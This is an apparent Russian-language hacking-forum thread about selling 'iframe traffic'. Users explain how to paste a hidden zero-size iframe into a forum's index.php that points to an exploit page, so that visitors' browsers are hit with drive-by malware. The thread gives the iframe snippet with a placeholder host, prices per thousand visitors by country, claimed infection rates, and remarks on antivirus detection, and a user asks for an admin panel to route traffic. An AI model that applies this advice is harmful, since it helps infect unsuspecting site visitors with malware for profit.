Не секрет, что на данный момент спрос на загрузки превышает спрос на взлом конкретных сайтов. Среди загрузок актуален ифрейм трафик. Как происходит его продажа? Просто вставляется в index.php строка наподобие <iframe src="http://site.com/iframe.php" width=0 height=0></iframe> ? Допустим у меня есть крупный форум со средним онлайном в 300-400 человек. Если я вставлю ифрейм на сутки, какой примерно будет доход и какой шанс что ифрейм заметят. Расскажите еще пожалуйста как обычно это организовывается )
ставят ифреим, в котором оыбчно сайт с различными уязвимостями для брузеров, через которые заливают на компьюетр жертвы вирусы. Из 1000 человек обычно скачают вирус человек 300 но сработает тока у немногих. На ифреим оьычно руагеться антивирус, так и замечают его.
vmn такой код лучше: Code: <iframe width=1 height=1 src="http://site.com" style="display:none"></iframe> Смотря какой у тебя форум, т.е русский или забугор... За 1000 русского трафа в среднем платят 2$, за USA - 5$, за UK - 8-10$ и т.д Заходишь на форум в раздел покупка продажа, пишешь обьявление "продаю траф такой-то страны" Тебе стучат люди, ты с ними договариваешся о цене, и прописываешь их ссылку в iframe на index'e форума... NFM Если вирус скачался(сплойт пробил браузер) то он запуститься 100% На сам <iframe> антивирус не ругается, он ругается на паблик сплойты, на которые видут ссылки в этих ифреймах...
А возможно сделать так, чтобы у каждого человека ифрейм грузился только один раз. Или он у них будет грузиться каждый раз при обновлении страницы.
Все зависит от эксплойта который весит в ифрейме, во всех сплойтах которые я видел была такая система: человек после одного захода на iframe получал "бан", после этого сплойт не загружал ему exe(вирус)
Если юзер скачает вирус, то 90% того что он у него запуститься, если антивирус не запапалит ! Смотря с какими людьми будешь работать и какой у них эксплойт, в среднем приватный эксплойт под осла даёт 15-17% пробива! Исходя из твоих цифр из 300-400 человек будет максимум 30-35 за которых тебе дадут лаве! Но ты учти что на форумах аудитория практически всегда одинаковая....
Много зависит от трафика, у меня сплойт дает 50% пробива на русском, 15-20 на Usa, Uk, и всего 3-5% на адалте
Может тогда кто-нибудь подскажет нормальную админку под это дело? Для контроля направления, и количества трафа на сплойты.